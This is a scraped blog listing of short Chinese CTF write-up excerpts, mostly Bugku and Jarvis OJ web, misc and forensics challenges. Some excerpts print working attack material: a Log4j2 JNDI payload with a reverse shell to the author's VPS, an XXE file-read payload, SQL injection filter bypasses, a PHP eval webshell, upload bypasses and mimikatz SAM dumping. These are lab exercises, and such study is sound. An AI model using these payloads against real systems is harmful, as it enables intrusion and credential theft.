- 博客(91)
- 收藏
- 关注
原创 bugku 树木的小秘密
可以看到很多python的东西,判断该exe为python编译的。得到easy_reverse.exe_extracted文件夹。下载文件,为exe,查PE,失败。根据提示base64解密。用python反编译。
2022-08-02 22:00:54 906 1
原创 bugku reverse 马保国安全卫士
下载解压,得到exe,随便点点,无用。IDA32位打开直接f5,打开string windows 搜索一下flag没有,但是拉到中间看到一串拥有flag特征的字符串应该是移位了,用栅栏密码改一下,移三位即可得到flag
2022-06-10 22:48:13 167
原创 bugku misc 怀疑人生
下载解压得到一个压缩包两张图片压缩包有密码,用ARCH爆破得到password,打开有一段beseunicode解码得到flag{hacker接下看第一张图片ctf2.jpg,可以看到隐藏有一个zip压缩包分离得到一个压缩包和一个文件txt文件有一段Ook加密,拿去解密得到接下在看第二张图片。是个二维码,用QR直接扫得到flagflag{hacker3oD54e12580} 提交,错误,????,后来一看评论,原来中间还要个base58.。。。将中间3oD54e,base58解码得
2022-05-04 00:13:30 306
原创 bugku misc 简单取证 1
下载文件解压得到根据其文件名以及目录结构,应该是要用SAM的用户信息PS:SAM文件:分支是HKEY_LOCAL_MACHINE\SAM,存储在C:\Windows\System32\config\SAM文件中,保存了用户的密码信息使用mimikatz读取信息,工具地址:https://github.com/ParrotSec/mimikatzlsadump::sam /sam:SAM /system:SYSTEM根据提示,解码这一串并组合得到flag...
2022-05-01 23:37:39 801
原创 数据结构-图
图的定义图的逻辑结构:多对多图的类型定义抽象数据类型定义图的存储结构图没有顺序存储结构,但可以用数组表示法(邻接矩阵)表示法:有几个顶点,则生成一个n*n的矩阵,1为有边,为0为无边无向图邻接矩阵有向图邻接矩阵①其矩阵可能是不对称的②顶点的出度=第i行元素之和顶点的入度=第i列元素之和顶点的度=第i行元素之和+第i列元素之和网(有权图)的邻接矩阵邻接矩阵的建立案列:创建无向网利用到前面的存储结构定义邻接矩阵的优缺点优点:1,简单,直观. 2,
2022-04-27 00:18:04 275
原创 bugku web-Apache Log4j2 RCE
一,准备环境有VPS即可二,题解1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的2,注意首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar2.2vps先允许反弹shell用到的端口2.3,再启动工具2.4,再开一个窗口监听nc2.5,构造payload,根据提示进行利用将地址改为自己的vps地址,然后将加密后的命令放到末尾原:${jndi:ldap://x.x.x.x:1389
2022-01-29 00:41:44 2941
原创 CTF AWD靶场搭建和第一题题解
首先安装docker环境添加GPG密钥并添加更新源curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
2021-11-17 08:51:20 4375 4
原创 malware-traffic-analysis 2014-11-16 流量分析和恶意代码分析
流量包下载题目:第 1 级问题:1) 被感染的 Windows 虚拟机的 IP 地址是多少?2) 被感染的 Windows 虚拟机的主机名是什么?3) 受感染虚拟机的 MAC 地址是多少?4) 受感染网站的 IP 地址是什么?5) 被入侵网站的域名是什么?6)提供漏洞利用工具包和恶意软件的 IP 地址和域名是什么?第 2 级问题:1) 指向漏洞利用工具包 (EK) 登陆页面的重定向 URL 是什么?2) 除了登陆页面(其中包含 CVE-2013-2551 IE 漏洞),EK 还发送了哪
2021-11-02 17:24:40 889 1
原创 bugku misc-最近解题
聊天下载发现是vm的镜像,考取证,直接用foremost分离出来,看到有一张图片有点东西,但很模糊jpg格式,用volat给dump下来,查找发现有三张jpgdump第一张就是了python2 vol.py -f win7.vmem --profile=Win7SP1x64 dumpfiles -Q 0x0000000027e7a300 -D ./得到个密码,继续在foremost分离出来的文件翻找,找到两个压缩包里面有flag.txt,用得到密码解压,成功了得到flag构成形式qq号
2021-10-19 20:43:42 173 2
原创 bugku misc-小美的秘密
下载题目,得到一张图片和一个压缩包(小美家.zip),压缩包要密码先看图片,发现图片里隐藏了另一张图片分离出来查看没什么收获,改一下高度看一下,发现一串字符串,结合第一张图片的栅栏,应该是栅栏密码,且有十一个栅栏,字数为11解码得到压缩包密码解压小美家.zip得到一个文件夹(客厅)和储物间.zip和卧室.zip先看客厅两张图片没啥用,看垃圾图文件,两个无后缀文件repairhead和神奇的字符串,010打开发现格式是jpg的格式,但文件头确是png的,修改成jpg的文件头,发现不行,发现文件
2021-10-09 08:30:55 732
原创 bugku misc-where is flag 番外片
得到题目压缩包,,出题人说借鉴了where is flag系列的部分思路,注意到crc32和时间都没获得有效信息,所以把重点放在文件大小上不过不管是文件大小还是压缩后大小,直接看不出东西,但是如果用文件大小减去压缩后的文件大小,就能得到这样一组数字,75 101 121 58 90 104 117 71 76 74 64 64 48转字符后得到Key:ZhuGL@@.0,获得了压缩包密码ZhuGL@@.0 解压出师表.rar得到一张图片出师表.jpg属性没有看到有用的信息,用010打开发现最后
2021-09-25 11:34:05 1587
原创 jarvisoj web-多题wp
api调用,XXE漏洞,上payload<?xml version="1.0"?><!DOCTYPE asdf[<!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">]><something>&xxe;</something>图片上传漏洞打开题目地址发现只能上传图片,而且绕不过,只能扫一波目录,发现了test.php,是phpinfo看到imagick打开了想到CVE-201
2021-09-20 16:29:37 3039
原创 jarvisoj web-simple injection
打开题目地址看到一个登录框,题目说是注入,抓包尝试一下 admin //尝试admin提示密码错误,其他用户名均提示用户名错误'or 1=1# //提示用户名错误,经过测试空格,+号,等都会被过滤,用/**/替代空格后返回密码,存在注入'or/**/1=1# //提示密码错误,确定过滤了空格'or/**/ascii(substr(database(),1,1))=105# 二分法得到当前数据库名第一个字母or(ascii(substr(database(),1,1))=
2021-09-18 15:08:30 73
原创 jarvisoj web-easy Gallery
打开题目地址,随便点击发现一个上传图片的地方,且url很像有文件包含的样子尝试一下,上传图片马,发现直接改后缀会被拦,应该是简单的检测了一下内容,上传成功返回id,且访问的upload.php直接访问这个目录后发现报错,摸索了一会终于在uploads目录访问到了上传的图片,在包含的时候发现报错,原来会自动补上php后缀,导致报错,用%00截断一下就行了,包含成功得到flag...
2021-09-14 08:12:16 87
原创 jarvisoj web-IN A mess
打开题目网址是空白的,f12看到index.phps,得到源代码if(!$_GET['id']){ header('Location: index.php?id=1'); exit();}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.')) # 查找.在a变量出现的位置{ echo 'Hahahahahaha'; return ;}#id==0,典型的弱类型比较,id=0e,即可绕过#b变量要求大于5
2021-09-13 20:07:10 212
原创 浙大CTF web-神盾局的秘密
打开题目地址,看到一张图片f12看到img后跟了一串base解码得到shield.jpg,将后缀改为php编码成base访问得到一串代码得到flag所在的pctf.php,直接访问出错,看到url里的showimg.php文件,想到将其编码base64,看一下源代码,发现img参数可以任意查看文件上面提示的shield,已经看过了,这时候想到phpo的web一般都会有index.php,编码base64访问一下看到包含了shield.php文件,那思路就来了,可以用index文件class传参p
2021-09-13 10:37:50 379
原创 jarvisoj web-PORT51 and LOCALHOST
PORT51 访问题目看到提示,请从51端口访问这里,该题目端口已经定了,那只能更改自己的了用curl更改访问端口即可得到flagsudo curl --local-port 51 http://题目地址/LOCALHOST抓包在头部添加X-Forwarded-for:127.0.0.1即可...
2021-09-10 16:21:33 83
原创 jarvisoj web-phpinfo
打开题目地址得到源码这题的突破点就是ini_set(‘session.serialize_handler’, ‘php’);查了下手册:php大于5.5.4的版本中默认使用php_serialize规则通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。再看到当一个上传在处理中,同时POST一个与INI中设置的session.upl
2021-09-10 10:28:45 101
原创 bugku web-login2
打开看到一个登录框。提示是命令执行,但这个框,怎么也不像有命令执行的呀看评论发现有注入,用sqlmap跑一下,正好回顾一下命令。python sqlmap.py -r sql.txt --level 5 --batch–batch //选项不询问,全部按照默认得到注入点,跑数据库python sqlmap.py -r web37.txt --dbs --hex,这里要很久跑完的时候忘记截图,直接关掉窗口了。。。得到一个information_schema和bugkuctf爆bugkuctf的表
2021-09-07 09:47:58 545 1
原创 bugku web-getshell
打开网址,发现被混淆了这,百度了很久,终于找到一篇关于解码混淆的文章https://www.52pojie.cn/thread-1074918-1-1.html搞了很久解出来得到<?phphighlight_file(__FILE__);@eval($_POST[ymlisisisiook]);?>用蚁剑链接发现只能再html目录下晃悠,写个phpinfo查看一下环境信息发现很多函数被禁用了,不过没有禁putenv,参考蚁剑插件之绕disable_functions下载好
2021-09-06 17:29:33 319
原创 bugku web-文件包含2
打开网址看到一个CKCTF,就没了。审查源代码发现一个upload.php,且url有明显的用于包含文件的file,包含upload提示只能上传图片,测试发现双后缀可绕过包含一下这个文件,用蚁剑链接发现返回为空菜刀也是一样,哎,换一种思路,这里既然有文件包含上传<script language='php'> system('ls') </script>然后进行包含访问,what?这,人傻了然后看了评论。。。直接包含flag就行了。。。。。...
2021-09-06 10:42:11 124
原创 bugku web-文件上传-php审计代码绕过
打开网址看到一个上传文件点且提示不能直接上传php文件先上传一个jpg图片,发现不行,查看笔记,发现我做过旧版bugku的该题目,手动狗头,分析源码这个点随便将multipart/form-data的一个字母改成大写就可绕过第二个点,将文件名改成源代码允许的php4即可然后改一下Content-Type: image/jpeg,改成Content-Type: image/jpg即可上传成功...
2021-09-04 17:14:54 119
原创 bugku web-安慰奖-考查反序列化和魔术方法
打开网址发现一片空白审查源代码发现一串base,解码得到备份打开查看发现源代码,<?phpheader("Content-Type: text/html;charset=utf-8");error_reporting(0);echo "<!-- YmFja3Vwcw== -->";class ctf{ protected $username = 'hack'; protected $cmd = 'NULL'; public function __
2021-09-04 15:23:42 263
原创 bugku web-源代码
打开网站看到一个输入框查看源代码发现很明显的加密解密得到将p1和p2合并起来,得到flagflag{879c01056e0322a95bd18220e2aadc3a}
2021-09-03 20:35:16 245
原创 bugku web-本地管理员
打开网址是一个登录框,随便输入两次就禁止访问了查看页面源码发现一串base,解码为test123结合题目本地和登录框的提示,应该是XFF头伪造抓包加入X-Forwarded-For: 127.0.0.1发现报错提示凭证错误,想起来得到的test123,应该是密码,填入,发包得到flag...
2021-09-03 20:26:06 60
原创 bugku web-(bp)
打开网址是一个登录框。已知账号是admin且根据提示是要爆破,top1000,爆破了完了发现相应包长度都一样,根本看不出那个是正确密码,但是发现每个相应包都会返回一串JavaScript代码告知我们的密码有错误既然是告知我们密码错误的,那么找出返回跟这一串js不一样的相应包即可在选项中添加接下来我们注意这个选项即可发现了很明显的发现js代码不一样,登录得到flag...
2021-09-03 16:53:53 176
原创 bugku misc-扭转乾坤
下载得到一张图片,拉入010发现没有线索,隐写发现用lsb隐写,将文件提取出来save bin 保存为txt文件,先看上面的十六进制突然发现最后八位数是4030B405,倒过来是504B0304,正好是zip文件的文件头,倒序过来用010导入16进制并保存为zip,解压得到用在线网址扫描条形码发现扫不出来想到txt的内容应该是前面缺了三条,后面缺了一条,与bugku{和}的条形码对比确实是前面缺了三条,笨方法,将缺的截下来用画图3D拼起来。。。。。用画图手动补全扫描得到flag.
2021-08-31 16:36:54 250
原创 bugku misc-神奇宝贝
下载压缩包发现解压错误。010打开发现文件尾部是zip压缩包的文件结尾(504B),将文件头改成zip的文件头,得出一张图片和一个压缩包图片里都是这个玩意,后来经过结合题目和百度,终于搜到了,这么一个东西对照得到whereisflag,拿去解压得到美丽的风景.zip和层层加密.txt解压发现压缩包还存在密码先看txt观察发现存在三个加密。1,摩斯侦探,2,篱笆地交叉2(应该是栅栏密码),3,加盐(MD5)先把0全部替换成.,把1换成-,把空格换成/,解密得到栅栏密码解密得到md5解密发现
2021-08-31 12:00:27 456
原创 bugku misc-improve yourleif
下载压缩包发现要密码,但是发现有四个文件都只有6比特可用crc32爆破出来内容拼起来得到bugku_youareprettygood解压得到全部文件,压缩包要密码先看图片根据提示,密码应该是图片方格里面的下一步演化,根据大佬给出的在线工具把图片的方格一个个点上去然后点击单步演化,我这里是已经演化完,得到的这里红色框里面的是演化成了0,所有得到012369849拿去解压得到flag.exe,passwd and mark=0.jpg运行exe发现运行不了拉入010看一下,发
2021-08-29 14:37:46 254
原创 bugku misc-花点流量听听歌
下载得到,花点流量听听歌.mp3文件用audactity打开发现报错用audtion打开,看查看频谱图,发现这个位置有点奇怪放大得到beaufort-cipher,一种加密百度一下得知这是一种类似于维吉尼亚密码的古典替换密码,这种密码是需要解密key的,所以我们继续往下看拉入010发现用压缩包和一串字符串foremost分离得到一个压缩包解压得到whereiskey,里面有flag.rar 要密码,txt是一串伤感的话,只能先从流量包入手发现都是USB的流量,提取一下 ,也可以用写好的
2021-08-27 17:42:25 639
原创 bugku misc-欢乐牛年
下载压缩包解压发现需要密码在注释中发现小写字母转数字,数字转大写字母对照得到25 T 16 13 L I 3 A,去掉空格拿去解压得到棋盘入门.zip和secret.pcapng,发现得到的压缩包还是需要密码,那么给的流量包肯定有密码,先分析一下都是usb的流量找了挺久的,发现到了2.4.1之后都会有一串01这里参考了大佬的提取命令kail执行tshark -r secret.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' >1
2021-08-27 13:42:25 387
原创 bugku misc-蜜雪冰城
下载压缩包解压得到三个文件py文件看起来好像要我写脚本解密,但是,我不会啊(手动狗头)所以我直接先跳过它,先看图片,在属性中发现啥意思啊,艹,看一下txt先,突然我懂了,在像素中(255,255,255)是白色,(0,0,0)是黑色,所以255替换成0,0替换成1就这样然后用Converter转一下文本看一下提到了slienteye,那就用它打开看一下,将图片载入slienteye,点击decode得到一个网盘地址打开是一点音乐,熟悉的你爱我呀,我爱你。。。。。。下载下来
2021-08-25 00:09:18 205
原创 bugku misc-虎符
下载得到wim文件,用2345好压解压得到,‘左’,‘右’两个文件夹根据题目的题目,flag应该是有两部分,那先看左边左文件夹有hint.txt 和hufu_left.jpgpassword应该是当铺密码,百度一波解密得到,65 68 68 再转ascii得到ADD但是不知道有什么用,先看一下图片,将图片拉入010,发现尾部有一个rar压缩包另存为1.rar,解压发现需要密码输入刚刚的656868发现不行,那加上ADD试一下,发现解压了,得到一个txt上面一行拿去unicode解码,
2021-08-23 17:35:08 245
原创 bugku misc-攻其不备
下载得到打开发现一张绝世好图(狗头)再根据题名分离一下,得到另一种图片拉入010发现没东西,回头看pdf,再根据题名,应该就在pdf本身,把这张绝世好图删了,这里不想下pdf编辑器可以用在线,得到emoji编码,这里对照一下在网上找到的大佬制作的对照表得到mumuziyyds,解压最好看的萝莉.zip得到两个加密的压缩包到这里没了线索,直接反手一手爆破我裂开,爆破半天。。。密码666666,得到假的key。。。那只能继续爆破另一个zip了终于很久之后,出来了。。。密码是一
2021-08-23 15:18:25 353
原创 bugku misc-出其不意
下载解压得到key和画X的既不是黑也不是白.zip,压缩包解压要密码,将key拉入010查看,发现是图片格式最后还有rar文件头用foremost分离得到一张图片和一个压缩包,解压压缩包得到这里想了很久,后来问大佬说贝斯不就是base吗,突然就想开了,那加蜂蜜不就可以说成加密,很好,先看一下图片,发现详细信息有一段base,还有一串文本拿到着一串base之后当时我是直接拿去base64解码了,可是没有用,又想了一下,贝斯掉了6个,base64减6,那不就是base58,到这里终于想
2021-08-23 00:12:07 237
原创 bugku crypto-python_jail
启动场景后得到nc ip+端口号连上之后发现print flag会报错而且经过测试只能传入10个字符多了就会报错那就不能用print利用python中help()函数,借报错信息带出flag变量值内容, 刚好10个字符
2021-08-22 12:13:38 564
原创 bugku msic-闹酒狂欢
下载得到一串16进制编码啥意思呢,不知道,先百度一波题名而wingding是一种字体那么先把这些16进制转成字符串脚本import binasciiS = '得到的16进制'a=binascii.unhexlify(S)print(a.decode('utf-8'))输出将这些直接复制到QQ的聊天框即可得到flag...
2021-08-21 17:09:14 186
原创 bugku -msic-奇怪的png
下载得到一张图片,用foremsot分离得到一个压缩包和一张图片压缩包需要密码,里面有四个文件pass1.txt, pass2.txt, pass3.txt, 图片真实CRC32.txt大小都很小,可以利用CRC32爆破出文本信息。pass1.txt爆破脚本:https://github.com/theonlypwner/crc32reverse 后面跟crc32pass2.txtpass3图片真实CRC32.tx图片真实CRC32.txt文件大小为6,所以信息不确定。根据文件名
2021-08-19 17:40:11 306
原创 bugku misc-Photo的自我修养
下载压缩包解压得到一张图片和两个压缩包,打开图片发现下面有点东西,改一下高度看一下,改成高度200,得到B:One2021@尝试打开001.zip发现要密码,拉入010看一下,缩包标志头第5 6位均是00 00,只有最后一个包含文件信息的块,第5 6位是00 14,将其余所有被改为00 00的文件以及文件夹标志头改为00 14,压缩包修复完成也可以用工具成功解压得到一张图片查看图片属性看到合起来得到:JustOne2021@,用这个解压key.zip,得到key文件拉入010观察发现
2021-08-17 15:14:18 212
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人